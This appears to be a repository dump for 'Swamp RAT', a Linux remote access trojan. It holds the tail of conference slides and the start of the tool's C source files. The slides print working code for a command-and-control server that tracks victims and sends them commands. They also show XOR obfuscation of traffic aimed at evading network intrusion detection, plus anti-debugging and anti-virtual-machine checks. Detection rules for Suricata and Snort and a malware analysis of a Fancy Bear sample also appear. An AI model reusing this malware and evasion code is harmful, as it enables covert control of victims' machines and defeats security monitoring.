799 | socklen_t client_len = sizeof(client); 800 | net_t_client_args_t *p_net_t_client_args = malloc(sizeof(net_t_client_args_t)); 801 | while (( client_fd = accept(server_fd, // Socket File Descriptor 802 | (struct sockaddr *)&client, // Client SockAddr Struct 803 | (socklen_t *)&client_len))){ 804 | pthread_t t_client; // Client Thread 805 | p_net_t_client_args->client_fd = client_fd; // Send Client File Descriptor 806 | p_net_t_client_args->p_victims = p_victims; // Pointer to Victims Struct 807 | p_net_t_client_args->p_commands = p_commands; // Pointer to Commands Struct 808 | pthread_attr_t attr_t_client; // Create Thread Attributes 809 | pthread_attr_init(&attr_t_client); // Initialize Attributes 810 | pthread_attr_setdetachstate(&attr_t_client, PTHREAD_CREATE_DETACHED); // Set Detached Attribute 811 | if (pthread_create(&t_client, 812 | &attr_t_client, net_t_client, p_net_t_client_args) < 0){ // Spawn Client Thread 813 | return false; 814 | } 815 | } 816 | free(p_net_t_client_args); // Cleanup 817 | } 818 | close(client_fd); // Close Client Socket File Descriptor 819 | return true; 820 | \end{minted} 821 | \end{minipage} 822 | \end{tcolorbox} 823 | \end{center} 824 | \end{frame} 825 | 826 | \begin{frame}[fragile]{} 827 | \frametitle{CnC Server} 828 | \framesubtitle{Handling Victim Sessions 0} 829 | \begin{center} 830 | \begin{tcolorbox}[title=net.c,colback=black] 831 | \begin{minipage}{0.5\textwidth} 832 | \begin{minted}[fontsize=\tiny]{c} 833 | void *net_t_client(void *args){ 834 | net_t_client_args_t *p_args = args; 835 | int sock = p_args->client_fd; 836 | net_client_beacon_t **p_victims = p_args->p_victims; // Get Pointer 837 | net_server_beacon_t **p_commands = p_args->p_commands; // Get Pointer 838 | net_client_beacon_t *p_net_client_beacon = malloc(sizeof(net_client_beacon_t)); // Allocate Client 839 | net_server_beacon_t *p_net_server_beacon = malloc(sizeof(net_server_beacon_t)); // Allocate Server 840 | while (true){ 841 | bool command = false; 842 | int read = recv(sock, p_net_client_beacon, sizeof(net_client_beacon_t), 0); // Read Client Beacons 843 | if (!read){ break; } 844 | if (read < 0){ 845 | fprintf(stderr, "[-] %s\n", strerror(errno)); 846 | free(p_net_client_beacon); 847 | pthread_exit(NULL); 848 | } 849 | net_update_victims(p_net_client_beacon, p_victims); // Update Victim Data 850 | // contuned ... 851 | } 852 | } 853 | \end{minted} 854 | \end{minipage} 855 | \end{tcolorbox} 856 | \end{center} 857 | \end{frame} 858 | 859 | \begin{frame}[fragile]{} 860 | \frametitle{CnC Server} 861 | \framesubtitle{Handling Victim Sessions 1} 862 | \begin{center} 863 | \begin{tcolorbox}[title=net.c,colback=black] 864 | \begin{minipage}{0.5\textwidth} 865 | \begin{minted}[fontsize=\tiny]{c} 866 | for (int i = 0; i < NET_MAX_CLIENTS; i++){ 867 | if (p_commands[i] != NULL && 868 | (strcmp(p_net_client_beacon->sysinfo.uuid, // Check Victim UUID 869 | p_commands[i]->uuid) == 0)){ 870 | command = true; 871 | if (send(sock, p_commands[i], sizeof(net_server_beacon_t), 0) < 0){ 872 | fprintf(stderr, "[-] %s\n", strerror(errno)); 873 | } 874 | net_remove_commands(p_commands[i], p_commands); // Command Sent to Victim 875 | } 876 | } 877 | if (command == false){ 878 | p_net_server_beacon->xor_key = DEFS_XOR_KEY; // Set Packet XOR Key 879 | p_net_server_beacon->status = true; 880 | if (send(sock, p_net_server_beacon, sizeof(net_server_beacon_t), 0) < 0){ 881 | fprintf(stderr, "[x] %s\n", strerror(errno)); 882 | free(p_net_server_beacon); 883 | free(p_net_client_beacon); 884 | pthread_exit(NULL); 885 | } 886 | } 887 | } 888 | \end{minted} 889 | \end{minipage} 890 | \end{tcolorbox} 891 | \end{center} 892 | \end{frame} 893 | 894 | \begin{frame} 895 | \frametitle{NCurses} 896 | \begin{center} 897 | \includegraphics[width=12cm,keepaspectratio]{ncurses} 898 | \end{center} 899 | \end{frame} 900 | 901 | \begin{frame} 902 | \frametitle{NCurses} 903 | \framesubtitle{What is it?} 904 | \begin{tcolorbox}[title=\href{https://en.wikipedia.org/wiki/Ncurses}{ncurses.log},colback=gray] 905 | NCurses - Also known as new curses, is a programming library providing an application programming interface (API) that allows the programmer to write text-based user interfaces in a terminal-independent manner. It is a toolkit for developing "GUI-like" application software that runs under a terminal emulator. It also optimizes screen changes, in order to reduce the latency experienced when using remote shells. - \href{https://en.wikipedia.org/wiki/Ncurses}{Wikipedia} 906 | \end{tcolorbox} 907 | \end{frame} 908 | 909 | \begin{frame} 910 | \frametitle{NCurses} 911 | \framesubtitle{What are we using it for?} 912 | \begin{itemize} 913 | \item{View Victim UUID} 914 | \item{View Victim CPU Status} 915 | \item{View Victim Username} 916 | \item{View Victim Architecture} 917 | \item{View Victim IP Address} 918 | \item{View Victim Ping} 919 | \item{View Victim Kernel Version} 920 | \item{Send Commands} 921 | \item{Everything is Better in Terminal} 922 | \end{itemize} 923 | \end{frame} 924 | 925 | \begin{frame}[fragile]{} 926 | \frametitle{NCurses} 927 | \framesubtitle{Create The main window!} 928 | \begin{center} 929 | \begin{tcolorbox}[title=net.c,colback=black] 930 | \begin{minipage}{0.5\textwidth} 931 | \begin{minted}[fontsize=\tiny]{c} 932 | WINDOW *ncurses_wmain_create(int port, 933 | net_client_beacon_t **p_victims, 934 | net_server_beacon_t **p_commands){ 935 | WINDOW *win_main; // Main Window 936 | win_main = initscr(); // Initalize Main Window 937 | if (start_color() == ERR || !has_colors() || !can_change_color()){ // Check for Color Supported Terminal 938 | fprintf(stderr, "%s\n", strerror(errno)); 939 | return false; 940 | } 941 | if (net_server_async(port, p_victims, p_commands) == false){ // Startup CnC Server ASYNC 942 | fprintf(stderr, "[x] failed to initalize cnc server\n"); 943 | return false; 944 | } 945 | noecho(); 946 | curs_set(0); // Position the Cursor 947 | init_pair(NCURSES_WMAIN_COLOR, COLOR_GREEN, COLOR_BLACK); // Set Color Pair 948 | wbkgd(win_main, COLOR_PAIR(NCURSES_WMAIN_COLOR)); // Set Window Background 949 | return win_main; // Return the Main Window 950 | } 951 | \end{minted} 952 | \end{minipage} 953 | \end{tcolorbox} 954 | \end{center} 955 | \end{frame} 956 | 957 | \begin{frame}[fragile]{} 958 | \frametitle{NCurses} 959 | \framesubtitle{Create the menu window!} 960 | \begin{center} 961 | \begin{tcolorbox}[title=net.c,colback=black] 962 | \begin{minipage}{0.5\textwidth} 963 | \begin{minted}[fontsize=\tiny]{c} 964 | bool ncurses_wmenu(WINDOW *win_main, // Pointer to Main Window 965 | WINDOW *win_menu, // Pointer to Menu Window 966 | char *win_menu_title){ // Menu Title 967 | int y, x; 968 | getmaxyx(win_main, y, x); // Get Max X Y 969 | wresize(win_menu, (y - y_margin), (x - x_margin)); // Resize Menu 970 | box(win_menu, 0, 0); // Menu Border 971 | mvwprintw(win_menu, // Print Menu Title 972 | 1, // Menu Y Value 973 | (x / 2) - (strlen(win_menu_title) / 2), // Menu X Value 974 | "%s", // Format String 975 | win_menu_title); // The Menu Title 976 | mvwaddch(win_menu, 2, 0, ACS_LTEE); // Draw Lines to Complete Menu 977 | mvwhline(win_menu, 2, 1, ACS_HLINE, (x - x_margin) - 2); 978 | mvwaddch(win_menu, 2, (x - x_margin) - 1, ACS_RTEE); 979 | return true; 980 | } 981 | \end{minted} 982 | \end{minipage} 983 | \end{tcolorbox} 984 | \end{center} 985 | \end{frame} 986 | 987 | \begin{frame} 988 | \frametitle{NCurses} 989 | \framesubtitle{The Interface} 990 | \begin{center} 991 | \begin{figure} 992 | \includegraphics[width=14cm,keepaspectratio]{rat_tool} 993 | \caption{Swamp RAT} 994 | \end{figure} 995 | \end{center} 996 | \end{frame} 997 | 998 | \begin{frame} 999 | \frametitle{Evasion} 1000 | \framesubtitle{How can we thwart most NIDS?} 1001 | \begin{center} 1002 | \begin{figure} 1003 | \includegraphics[width=6cm,keepaspectratio]{bypass_firewall} 1004 | \caption{Bill Gates} 1005 | \end{figure} 1006 | \end{center} 1007 | \end{frame} 1008 | 1009 | \begin{frame} 1010 | \frametitle{Evasion} 1011 | \framesubtitle{First Hint} 1012 | \begin{center} 1013 | \includegraphics[width=10cm,keepaspectratio]{xor_gate} 1014 | \end{center} 1015 | \end{frame} 1016 | 1017 | \begin{frame} 1018 | \frametitle{Evasion} 1019 | \framesubtitle{Second Hint} 1020 | \begin{center} 1021 | \includegraphics[width=5cm,keepaspectratio]{xor_truth_table} 1022 | \end{center} 1023 | \end{frame} 1024 | 1025 | \begin{frame}[fragile]{} 1026 | \frametitle{Evasion} 1027 | \framesubtitle{The Function to Bypass Most NIDS} 1028 | \begin{center} 1029 | \begin{tcolorbox}[title=net.c,colback=black] 1030 | \begin{minipage}{0.5\textwidth} 1031 | \begin{minted}[fontsize=\tiny]{c} 1032 | bool crypt_decrypt_xor(char *data, // Pointer to Data Structure 1033 | int data_size, // Size of Data 1034 | int key){ // The Key 1035 | for (int i = 0; i < data_size; i++){ 1036 | if (i > (int)sizeof(int) - 1){ // Skip over the Key 1037 | data[i] = data[i]^key; // XOR the Data 1038 | } 1039 | } 1040 | return true; 1041 | } 1042 | \end{minted} 1043 | \end{minipage} 1044 | \end{tcolorbox} 1045 | \end{center} 1046 | \end{frame} 1047 | 1048 | \begin{frame} 1049 | \frametitle{Evasion} 1050 | \framesubtitle{Clear Dataframe vs XOR Dataframe} 1051 | \begin{center} 1052 | \begin{figure} 1053 | \includegraphics[width=14cm,keepaspectratio]{tcp_xor_dataframe} 1054 | \caption{Comparison of TCP Dataframes} 1055 | \end{figure} 1056 | \end{center} 1057 | \end{frame} 1058 | 1059 | \begin{frame} 1060 | \frametitle{Evasion} 1061 | \framesubtitle{But Why?} 1062 | \begin{center} 1063 | \includegraphics[width=7cm,keepaspectratio]{but_why} 1064 | \end{center} 1065 | \end{frame} 1066 | 1067 | \begin{frame} 1068 | \frametitle{Evasion} 1069 | \framesubtitle{But we can detect this with Lua!} 1070 | \begin{itemize} 1071 | \item{Suricata} 1072 | \begin{itemize} 1073 | \item{Lua Scripting} 1074 | \end{itemize} 1075 | \item{Snort} 1076 | \begin{itemize} 1077 | \item{Lua Scripting} 1078 | \end{itemize} 1079 | \end{itemize} 1080 | \end{frame} 1081 | 1082 | \begin{frame}[fragile]{} 1083 | \frametitle{Evasion} 1084 | \framesubtitle{Lua Script Example} 1085 | \begin{center} 1086 | \begin{tcolorbox}[title=alert.lua,colback=black] 1087 | \begin{minipage}{0.5\textwidth} 1088 | \begin{minted}[fontsize=\tiny]{lua} 1089 | function init (args) 1090 | local needs = {} 1091 | needs["http.request_line"] = tostring(true) 1092 | return needs 1093 | end 1094 | 1095 | function match(args) 1096 | a = tostring(args["http.request_line"]) 1097 | if #a > 0 then 1098 | if a:find("^POST%s+/.*%.php%s+HTTP/1.0$") then 1099 | return 1 1100 | end 1101 | end 1102 | return 0 1103 | end 1104 | return 0 1105 | \end{minted} 1106 | \end{minipage} 1107 | \end{tcolorbox} 1108 | \end{center} 1109 | \end{frame} 1110 | 1111 | \begin{frame}[fragile]{} 1112 | \frametitle{Evasion} 1113 | \framesubtitle{Remember NJRat?} 1114 | \begin{center} 1115 | \begin{tcolorbox}[title=njrat.rules,colback=black] 1116 | \begin{minipage}{0.5\textwidth} 1117 | \begin{minted}[fontsize=\tiny]{c} 1118 | alert tcp any any -> \$EXTERNAL_NET any ( 1119 | msg:"NJRat/Bladabindi APT-C-27 Variant CnC Beacon"; 1120 | content:"medo2|2a 5f 5e|"; nocase; fast_pattern; 1121 | pcre:"/(inf|kl|msg|pl)medo2\x2a\x5f\x5e[a-z,0-9,\+\/,\=]{1,}/i"; 1122 | flow:to_server,established; 1123 | reference:md5,382788bb234b75a35b80ac69cb7ba306; 1124 | reference:url,https://ti.360.net/blog/articles/analysis-of-apt-c-27; 1125 | classtype:trojan-activity; 1126 | sid:2000000; 1127 | rev:01; 1128 | ) 1129 | \end{minted} 1130 | \end{minipage} 1131 | \end{tcolorbox} 1132 | \end{center} 1133 | \end{frame} 1134 | 1135 | \begin{frame} 1136 | \frametitle{Evasion} 1137 | \framesubtitle{Remember the TCP Dataframes?} 1138 | \begin{center} 1139 | \begin{figure} 1140 | \includegraphics[width=14cm,keepaspectratio]{tcp_xor_dataframe} 1141 | \caption{Find Fast Pattern Here?} 1142 | \end{figure} 1143 | \end{center} 1144 | \end{frame} 1145 | 1146 | \begin{frame} 1147 | \frametitle{Evasion} 1148 | \framesubtitle{Performance:Detection} 1149 | \begin{center} 1150 | \includegraphics[width=14cm,keepaspectratio]{server_room_fire} 1151 | \end{center} 1152 | \end{frame} 1153 | 1154 | \begin{frame} 1155 | \frametitle{Evasion} 1156 | \framesubtitle{The Debugger} 1157 | \begin{center} 1158 | \includegraphics[width=14cm,keepaspectratio]{debugger} 1159 | \end{center} 1160 | \end{frame} 1161 | 1162 | \begin{frame}[fragile]{} 1163 | \frametitle{Evasion} 1164 | \framesubtitle{The Debugger} 1165 | \begin{center} 1166 | \begin{tcolorbox}[title=re.c,colback=black] 1167 | \begin{minipage}{0.5\textwidth} 1168 | \begin{minted}[fontsize=\tiny]{c} 1169 | bool re_ptrace(){ 1170 | if (ptrace(PTRACE_TRACEME, // __ptrace request 1171 | 0, // pid_t 1172 | 1, // *addr 1173 | 0 // *data 1174 | ) < 0){ 1175 | return true; 1176 | } else{ 1177 | return false; 1178 | } 1179 | } 1180 | \end{minted} 1181 | \end{minipage} 1182 | \end{tcolorbox} 1183 | \end{center} 1184 | \end{frame} 1185 | 1186 | \begin{frame} 1187 | \frametitle{Evasion} 1188 | \framesubtitle{PTRACE\_TRACEME} 1189 | \begin{tcolorbox}[title=ptrace.log,colback=gray] 1190 | PTRACE\_TRACEME \\ 1191 | Indicate that this process is to be traced by its parent. A process probably shouldn't make this request if its parent isn't expecting to trace it. (pid, addr, and data are ignored.)\\ 1192 | \end{tcolorbox} 1193 | \end{frame} 1194 | 1195 | \begin{frame}[fragile]{} 1196 | \frametitle{Evasion} 1197 | \framesubtitle{The Virtual Machine 0} 1198 | \begin{center} 1199 | \begin{tcolorbox}[title=re.c,colback=black] 1200 | \begin{minipage}{0.5\textwidth} 1201 | \begin{minted}[fontsize=\tiny]{c} 1202 | bool re_kernel_module(char *kernel_module){ 1203 | if (strlen(kernel_module) + 16 > RE_BASH_COMMAND_MAX_LEN){ 1204 | fprintf(stderr, "[x] kernel module name length exceeds limitations\n"); 1205 | return false; 1206 | } 1207 | char command[RE_BASH_COMMAND_MAX_LEN]; 1208 | sprintf(command, "grep -Po '^%s\x20' /proc/modules", kernel_module); 1209 | FILE *fd = popen(command, "r"); 1210 | if (fd == NULL){ 1211 | fprintf(stderr, "[x] failed to read kernel module list"); 1212 | return false; 1213 | } 1214 | char buff[RE_KERNEL_MODULE_NAME_MAX_SIZE]; 1215 | memset(buff, 0, sizeof(buff)); 1216 | fread(buff, 1, strlen(kernel_module), fd); 1217 | if (strncmp(buff, kernel_module, strlen(kernel_module)) == 0){ 1218 | return true; 1219 | } else{ 1220 | return false; 1221 | } 1222 | } 1223 | \end{minted} 1224 | \end{minipage} 1225 | \end{tcolorbox} 1226 | \end{center} 1227 | \end{frame} 1228 | 1229 | \begin{frame}[fragile]{} 1230 | \frametitle{Evasion} 1231 | \framesubtitle{The Virtual Machine 1} 1232 | \begin{center} 1233 | \begin{tcolorbox}[title=re.c,colback=black] 1234 | \begin{minipage}{0.5\textwidth} 1235 | \begin{minted}[fontsize=\tiny]{c} 1236 | bool re_kernel_modules(){ 1237 | if (re_kernel_module("virtio") == true){ 1238 | return true; 1239 | } else if (re_kernel_module("vboxvideo") == true){ 1240 | return true; 1241 | } else if (re_kernel_module("vboxguest") == true){ 1242 | return true; 1243 | } else if (re_kernel_module("vboxsf") == true){ 1244 | return true; 1245 | } else{ 1246 | return false; 1247 | } 1248 | } 1249 | \end{minted} 1250 | \end{minipage} 1251 | \end{tcolorbox} 1252 | \end{center} 1253 | \end{frame} 1254 | 1255 | \begin{frame}[fragile]{} 1256 | \frametitle{Evasion} 1257 | \framesubtitle{The Hypervisor} 1258 | \begin{center} 1259 | \begin{tcolorbox}[title=re.c,colback=black] 1260 | \begin{minipage}{0.5\textwidth} 1261 | \begin{minted}[fontsize=\tiny]{c} 1262 | bool re_hypervisor(){ 1263 | char hypervisor[] = "hypervisor"; 1264 | char command[] = "grep -m 1 -Po 'hypervisor' /proc/cpuinfo"; 1265 | char buff[RE_KERNEL_MODULE_NAME_MAX_SIZE]; 1266 | FILE *fd = popen(command, "r"); 1267 | if (fd == NULL){ 1268 | fprintf(stderr, "[x] failed to read cpuinfo"); 1269 | return false; 1270 | } 1271 | memset(buff, 0, sizeof(buff)); 1272 | fread(buff, 1, strlen(hypervisor), fd); 1273 | if (strncmp(buff, hypervisor, strlen(hypervisor)) == 0){ 1274 | return true; 1275 | } else{ 1276 | return false; 1277 | } 1278 | } 1279 | \end{minted} 1280 | \end{minipage} 1281 | \end{tcolorbox} 1282 | \end{center} 1283 | \end{frame} 1284 | 1285 | \begin{frame} 1286 | \frametitle{Anyone else doing it right?} 1287 | \begin{center} 1288 | \begin{figure} 1289 | \includegraphics[width=9cm,keepaspectratio]{doing_it_right} 1290 | \caption{Doing something right!} 1291 | \end{figure} 1292 | \end{center} 1293 | \end{frame} 1294 | 1295 | \begin{frame} 1296 | \frametitle{Anyone else doing it right?} 1297 | \framesubtitle{These Guys} 1298 | \begin{center} 1299 | \begin{figure} 1300 | \includegraphics[width=9cm,keepaspectratio]{fancy_bear} 1301 | \caption{Fancy Bear APT} 1302 | \end{figure} 1303 | \end{center} 1304 | \end{frame} 1305 | 1306 | \begin{frame} 1307 | \frametitle{Anyone else doing it right?} 1308 | \framesubtitle{Fancy Bear Analysis - Entropy} 1309 | \begin{center} 1310 | \begin{figure} 1311 | \includegraphics[width=6cm,keepaspectratio]{fancy_bear_portex_analyzer} 1312 | \caption{Entropy Analysis with PortexAnalyzer} 1313 | \end{figure} 1314 | \end{center} 1315 | \end{frame} 1316 | 1317 | \begin{frame} 1318 | \frametitle{Anyone else doing it right?} 1319 | \framesubtitle{Fancy Bear Analysis - What Are We Dealing With?} 1320 | \begin{center} 1321 | \begin{figure} 1322 | \includegraphics[width=14cm,keepaspectratio]{fancy_bear_die} 1323 | \caption{Detect it Easy} 1324 | \end{figure} 1325 | \end{center} 1326 | \end{frame} 1327 | 1328 | \begin{frame} 1329 | \frametitle{Anyone else doing it right?} 1330 | \framesubtitle{Fancy Bear Analysis - inst} 1331 | \begin{center} 1332 | \begin{figure} 1333 | \includegraphics[width=14cm,keepaspectratio]{fancy_bear_analysis_0} 1334 | \caption{inst export is rather odd} 1335 | \end{figure} 1336 | \end{center} 1337 | \end{frame} 1338 | 1339 | \begin{frame} 1340 | \frametitle{Anyone else doing it right?} 1341 | \framesubtitle{Fancy Bear Analysis - .NET Injection in C++} 1342 | \begin{center} 1343 | \begin{figure} 1344 | \includegraphics[width=9cm,keepaspectratio]{fancy_bear_analysis_1} 1345 | \caption{.NET Assembly Injection Function} 1346 | \end{figure} 1347 | \end{center} 1348 | \end{frame} 1349 | 1350 | \begin{frame} 1351 | \frametitle{Anyone else doing it right?} 1352 | \framesubtitle{Fancy Bear Analysis - .NET Injection in C++} 1353 | \begin{center} 1354 | \begin{figure} 1355 | \includegraphics[width=8cm,keepaspectratio]{fancy_bear_analysis_2} 1356 | \caption{CLRCreateInstance .NET Assembly Injection Setup} 1357 | \end{figure} 1358 | \end{center} 1359 | \end{frame} 1360 | 1361 | \begin{frame} 1362 | \frametitle{Anyone else doing it right?} 1363 | \framesubtitle{Fancy Bear Analysis - .NET Injection in C++ SafeArrays} 1364 | \begin{center} 1365 | \begin{figure} 1366 | \includegraphics[width=6cm,keepaspectratio]{fancy_bear_analysis_3} 1367 | \caption{Somewhere between SafeArrayUnlock and SafeArrayDestroy} 1368 | \end{figure} 1369 | \end{center} 1370 | \end{frame} 1371 | 1372 | \begin{frame} 1373 | \frametitle{Anyone else doing it right?} 1374 | \framesubtitle{Fancy Bear Analysis - .NET Injection in C++ Payload} 1375 | \begin{center} 1376 | \begin{figure} 1377 | \includegraphics[width=13cm,keepaspectratio]{fancy_bear_analysis_4} 1378 | \caption{The .NET Assembly Payload} 1379 | \end{figure} 1380 | \end{center} 1381 | \end{frame} 1382 | 1383 | \begin{frame} 1384 | \frametitle{Anyone else doing it right?} 1385 | \framesubtitle{Fancy Bear Analysis - .NET Injection in C++ Payload} 1386 | \begin{center} 1387 | \begin{figure} 1388 | \includegraphics[width=4cm,keepaspectratio]{fancy_bear_analysis_5} 1389 | \caption{Payload Metadata} 1390 | \end{figure} 1391 | \end{center} 1392 | \end{frame} 1393 | 1394 | \begin{frame} 1395 | \frametitle{Anyone else doing it right?} 1396 | \framesubtitle{Fancy Bear Analysis - Payload Entropy} 1397 | \begin{center} 1398 | \begin{figure} 1399 | \includegraphics[width=14cm,keepaspectratio]{fancy_bear_analysis_6} 1400 | \caption{Payload Entropy} 1401 | \end{figure} 1402 | \end{center} 1403 | \end{frame} 1404 | 1405 | \begin{frame} 1406 | \frametitle{Anyone else doing it right?} 1407 | \framesubtitle{Fancy Bear Analysis - CnC} 1408 | \begin{center} 1409 | \begin{figure} 1410 | \includegraphics[width=9cm,keepaspectratio]{fancy_bear_analysis_7} 1411 | \caption{CnC from Payload} 1412 | \end{figure} 1413 | \end{center} 1414 | \end{frame} 1415 | 1416 | \begin{frame} 1417 | \frametitle{Anyone else doing it right?} 1418 | \framesubtitle{Fancy Bear Analysis - CnC Communication Example} 1419 | \begin{center} 1420 | \begin{figure} 1421 | \includegraphics[width=14cm,keepaspectratio]{fancy_bear_analysis_8} 1422 | \caption{CnC Example Communication} 1423 | \end{figure} 1424 | \end{center} 1425 | \end{frame} 1426 | 1427 | \begin{frame} 1428 | \frametitle{Anyone else doing it right?} 1429 | \framesubtitle{Fancy Bear Analysis - CnC Encrypted Dataframes} 1430 | \begin{center} 1431 | \begin{figure} 1432 | \includegraphics[width=10cm,keepaspectratio]{fancy_bear_analysis_9} 1433 | \caption{Encrypted Dataframes} 1434 | \end{figure} 1435 | \end{center} 1436 | \end{frame} 1437 | 1438 | \begin{frame} 1439 | \frametitle{Anyone else doing it right?} 1440 | \framesubtitle{Fancy Bear Analysis - Unpacking Demo} 1441 | \begin{center} 1442 | \begin{figure} 1443 | \includegraphics[width=9cm,keepaspectratio]{demo_serious} 1444 | \caption{It's getting serious!} 1445 | \end{figure} 1446 | \end{center} 1447 | \end{frame} 1448 | 1449 | \begin{frame} 1450 | \frametitle{Anyone else doing it right?} 1451 | \framesubtitle{Fancy Bear Analysis - Doing it Right!} 1452 | \begin{center} 1453 | \begin{figure} 1454 | \includegraphics[width=8cm,keepaspectratio]{powder_blues} 1455 | \caption{Doing it right on the wrong side of town!} 1456 | \end{figure} 1457 | \end{center} 1458 | \end{frame} 1459 | 1460 | \begin{frame} 1461 | \frametitle{Summary} 1462 | \framesubtitle{What did I learn} 1463 | \begin{itemize} 1464 | \item{TCP Socket Programming Sucks} 1465 | \item{Bypass NIDS with XOR TCP Dataframes} 1466 | \item{Anti-Debug / Anti-VM Linux Techniques} 1467 | \item{NCurses Looks Cool} 1468 | \item{Everything in Terminal is Better} 1469 | \end{itemize} 1470 | \end{frame} 1471 | 1472 | \begin{frame} 1473 | \frametitle{Swamp RAT Demo} 1474 | \begin{center} 1475 | \includegraphics[width=7cm,keepaspectratio]{demo_meme} 1476 | \end{center} 1477 | \end{frame} 1478 | 1479 | \begin{frame} 1480 | \frametitle{Anyone else doing it right?} 1481 | \framesubtitle{Buy my malware?} 1482 | \begin{center} 1483 | \includegraphics[width=5.5cm,keepaspectratio]{malware_the_rock_meme} 1484 | \end{center} 1485 | \end{frame} 1486 | 1487 | \begin{frame} 1488 | \frametitle{Questions} 1489 | \begin{center} 1490 | \includegraphics[width=7cm,keepaspectratio]{questions} 1491 | \end{center} 1492 | \end{frame} 1493 | 1494 | \begin{frame} 1495 | \frametitle{References} 1496 | \begin{center} 1497 | \begin{itemize} 1498 | \item{\href{https://en.wikipedia.org/wiki/Main_Page}{Wikipedia}} 1499 | \item{\href{https://ti.360.net/blog/articles/analysis-of-apt-c-27/}{NJRat Article}} 1500 | \item{\href{https://www.virustotal.com/\#/file/0a9c88d03260b92608c9c079a1b449cf46e5cd764f12f2ec852038dd6bd0fa97/detection}{NJRat Sample}} 1501 | \item{\href{https://www.virustotal.com/\#/file/4e51a6779a7776055ebdeffe28d00e8866b2e722e3ccb6cba868cf8cdc86b1a3/detection}{NJRat Unpacked Sample}} 1502 | \item{\href{http://sfkino.tistory.com/70}{Alibaba Malware Article}} 1503 | \item{\href{https://www.virustotal.com/\#/file/d057088d0de3d920ea0939217c756274018b6e89cbfc74f66f50a9d27a384b09/detection}{Alibaba Malware Sample}} 1504 | \item{\href{https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/}{PowerPool Malware Article}} 1505 | \item{\href{https://www.virustotal.com/\#/file/58a50840c04cd15f439f1cc1b684e9f9fa22c0d64f44a391d9e2b1222e5cd6bd/details}{PowerPool Malware Sample}} 1506 | \item{\href{https://www.virustotal.com/\#/file/9c08136b26ee5234c61a5d9e5a17afb15da35efc66514d2df5b53178693644c5/detection}{PowerPool Malware Sample Patched Version}} 1507 | \item{\href{https://www.symantec.com/security-center/writeup/2018-092116-1134-99?om_rssid=sr-latestthreats30days\#technicaldescription}{FancyBear APT Article}} 1508 | \item{\href{https://www.virustotal.com/\#/file/a37eda810ca92486bfb0e1f1b27adb7c9df57aafab686c000ae1d6ec5d6f6180/detection}{FancyBear APT Sample}} 1509 | \item{\href{https://www.virustotal.com/\#/file/90e7c99effc7e4360c45a2af7ca9cc23313902a40c30d48cac8db048e9e4c0f6/detection}{FancyBear APT Unpacked .NET Assembly}} 1510 | \end{itemize} 1511 | \end{center} 1512 | \end{frame} 1513 | 1514 | \begin{frame} 1515 | \frametitle{Questions} 1516 | \begin{center} 1517 | \includegraphics[width=12cm,keepaspectratio]{thank_you} 1518 | \end{center} 1519 | \end{frame} 1520 | 1521 | \end{document} -------------------------------------------------------------------------------- /img/swamp-rat.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/lillypad/swamp-rat/de33e7a63708aad4393144c40c60666cb07fae15/img/swamp-rat.gif -------------------------------------------------------------------------------- /src/include/common.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char *itoa(int x){ 6 | /* 7 | :TODO: integer to (char *) 8 | :x: integer 9 | :returns: (char *) 10 | */ 11 | char* buffer = malloc(sizeof(char) * sizeof(int) * 4 + 1); 12 | if (buffer){ 13 | sprintf(buffer, "%d", x); 14 | } 15 | return buffer; 16 | } 17 | -------------------------------------------------------------------------------- /src/include/crypt.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License | 15 | | along with this program. If not, see . | 16 | \-----------------------------------------------------------------------*/ 17 | 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | bool crypt_encrypt_xor(char *data, 25 | int data_size, 26 | int key){ 27 | /* 28 | :TODO: encrypt config data structure 29 | :data: pointer to data structure 30 | :data_size: size of the data 31 | :key: xor integer key 32 | :returns: boolean 33 | */ 34 | for (int i = 0; i < data_size; i++){ 35 | if (i > (int)sizeof(int) - 1){ 36 | data[i] = data[i]^key; 37 | } 38 | } 39 | return true; 40 | } 41 | 42 | bool crypt_encrypt_xor_all(char *data, 43 | int data_size, 44 | int key){ 45 | /* 46 | :TODO: encrypt config data structure 47 | :data: pointer to data structure 48 | :data_size: size of the data 49 | :key: xor integer key 50 | :returns: boolean 51 | */ 52 | for (int i = 0; i < data_size; i++){ 53 | data[i] = data[i]^key; 54 | } 55 | return true; 56 | } 57 | 58 | bool crypt_decrypt_xor_all(char *data, 59 | int data_size, 60 | int key){ 61 | /* 62 | :TODO: encrypt config data structure 63 | :data: pointer to data structure 64 | :data_size: size of the data 65 | :key: xor integer key 66 | :returns: boolean 67 | */ 68 | for (int i = 0; i < data_size; i++){ 69 | data[i] = data[i]^key; 70 | } 71 | return true; 72 | } 73 | 74 | bool crypt_decrypt_xor(char *data, 75 | int data_size, 76 | int key){ 77 | /* 78 | :TODO: decrypt config data structure 79 | :data: pointer to data structure 80 | :data_size: size of the data 81 | :key: xor integer key 82 | :returns: boolean 83 | */ 84 | for (int i = 0; i < data_size; i++){ 85 | if (i > (int)sizeof(int) - 1){ 86 | data[i] = data[i]^key; 87 | } 88 | } 89 | return true; 90 | } 91 | 92 | int crypt_random_xor_key(){ 93 | srand(time(NULL)); 94 | return rand(); 95 | } 96 | -------------------------------------------------------------------------------- /src/include/defs.h: -------------------------------------------------------------------------------- 1 | /*-----------------------------------------------------------------------\ 2 | | Copyright (C) 2018 Lilly Chalupowski | 3 | | | 4 | | This program is free software: you can redistribute it and/or modify | 5 | | it under the terms of the GNU General Public License as published by | 6 | | the Free Software Foundation, either version 3 of the License, or | 7 | | (at your option) any later version. | 8 | | | 9 | | This program is distributed in the hope that it will be useful, | 10 | | but WITHOUT ANY WARRANTY; without even the implied warranty of | 11 | | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the | 12 | | GNU General Public License for more details. | 13 | | | 14 | | You should have received a copy of the GNU General Public License 